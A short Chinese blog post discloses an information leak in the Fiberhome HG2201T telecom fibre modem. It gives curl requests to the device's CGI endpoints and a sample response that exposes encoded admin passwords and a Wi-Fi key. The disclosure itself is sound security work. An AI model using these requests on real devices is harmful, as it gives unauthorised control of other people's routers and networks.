电信光猫 - 烽火 HG2201T 敏感信息泄露

备份信息中可以泄露了超级密码,需要简单解密 curl http://192.168.1.1:8080/cgi-bin/login.htm.cgi # 管理后台 curl http://192.168.1.1:8080/cgi-bin/baseinfoSet.cgi # 备份信息 curl http://192.169.1.1:8080/cgi-bin/baseinfo.cgi # 设备信息 返回结果 { "RETURN": { "success": true }, "BASEINFOSET": { "baseinfoSet_INTERNETMAC": "XX:XX:XX:51:7C:C0", "baseinfoSet_TR069MAC": "XX:XX:XX:51:7c:c1", "baseinfoSet_VOIPMAC": "XX:XX:XX:51:7c:c2", "baseinfoSet_PRIPROTOCOLMAC": "XX:XX:XX:51:7c:c3", "baseinfoSet_WLANMAC": "XX:XX:XX:51:7c:cd", "baseinfoSet_PONMAC": "XX:XX:XX:51:7c:cf", "baseinfoSet_INTERNETEN": "1", "baseinfoSet_TR069EN": "1", "baseinfoSet_VOIPEN": "1", "baseinfoSet_PRIPROTOCOLEN": "1", "baseinfoSet_PONEN": "", "baseinfoSet_TELECOMACCOUNT": "telecomadmin", "baseinfoSet_TELECOMPASSWORD": "120&105&112&105&103&115&113&101&104&113&109&114&49&50&50&54&51&55&49&48&", "baseinfoSet_USERACCOUNT": "useradmin", "baseinfoSet_USERPASSWORD": "104&116&111&107&54&56&51&53&54&56&51&53&", "baseinfoSet_MANUFACTUREROUI": "XXXXXX", "baseinfoSet_DEVICESERIALNUMBER": "XXXXXX-3C846XXXXXX517CC0", "baseinfoSet_Compiletime": "23:36:36 Jan 25 2018", "baseinfoSet_SOFTWAREVERSION": "V1.00.M5002", "baseinfoSet_EXTNUMBER": "RP000000", "baseinfoSet_HARDWAREVERSION": "V2.1", "baseinfoSet_HARDWARECODE": "WKE7.200.400R1A", "baseinfoSet_SSID": "ChinaNet-Code", "baseinfoSet_WPAKEY": "JavaIsBest1024Code!...

July 5, 2018 · 2 min · lyincc